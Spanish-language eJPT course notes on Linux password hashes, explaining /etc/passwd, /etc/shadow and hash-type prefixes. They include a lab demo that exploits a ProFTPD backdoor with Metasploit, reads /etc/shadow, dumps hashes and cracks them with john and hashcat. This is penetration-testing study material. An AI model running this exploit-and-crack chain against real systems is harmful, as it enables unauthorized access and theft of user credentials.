eJPT
  • 👋Welcome
  • Tools
    • 🔭Escaneo y Enumeración
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducción a la Recopilación de Información
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Demo: Dumping & Cracking Linux Password Hashes
  • Quiz: Dumping & Cracking Linux Password Hashes
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: Post-Exploitation
  3. Dumping & Cracking

Linux Password Hashes

Linux tiene soporte para múltiples usuarios y, como resultado, varios usuarios pueden acceder al sistema simultáneamente. Esto puede verse como una ventaja y una desventaja desde una perspectiva de seguridad, ya que varias cuentas ofrecen múltiples vectores de acceso para los atacantes y, por lo tanto, aumentan el riesgo general del servidor.

Toda la información de todas las cuentas en Linux se almacena en el archivo passwd ubicado en: /etc/passwd

No podemos ver las contraseñas de los usuarios en el archivo passwd porque están encriptadas y cualquier usuario del sistema puede leer el archivo passwd.

Todas las contraseñas encriptadas de los usuarios se almacenan en el archivo shadow. Se puede encontrar en el siguiente directorio: /etc/shadow

Solo la cuenta raíz puede acceder y leer el archivo shadow, esta es una característica de seguridad muy importante ya que evita que otras cuentas del sistema accedan a las contraseñas cifradas.

El archivo shadow nos brinda información sobre el algoritmo de hash que se está utilizando y el hash de la contraseña. Esto es muy útil ya que podemos determinar el tipo de algoritmo de hash que se está utilizando y su solidez. Podemos determinar esto observando el número que aparece después del nombre de usuario encapsulado por el símbolo de dólar (S).

Value
Hashing Algorithm

$1

MD5

$2

Blowfish

$5

SHA-256

$6

SHA-512

Demo: Dumping & Cracking Linux Password Hashes

nmap -sv 192.234.199.3
searchsploit ProFTPD

# Inicializamos MSF
msf5 > setg RHOSTS 192.234.199.3
msf5 > search ProFTPD
msf5 > use exploit/unix/ftp/proftpd_133c backdoor
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > show options
msf5 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

/bin/bash -i
cat /etc/shadow

# Proceso si el algoritomo es SHA 512
# Copiar todo el Hash

# Tambien puede utiulizar metasploit
msf5 > use post/linux/gather/hashdump
msf5 post(linux/gather/hashdump) > show options
msf5 post(linux/gather/hashdump) > set SESSION 2
msf5 post(linux/gather/hashdump) > run

# Opcion 1
gzip -d /usr/share/wordlists/rockyou.txt.gz
john --format=sha512crypt /root/hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

# Opcion 2
hashcat -a3 -m 1800  /root/hashes.txt /usr/share/wordlists/rockyou.txt

Quiz: Dumping & Cracking Linux Password Hashes

PreviousWindows Password HashesNextPivoting Lesson

Last updated 8 months ago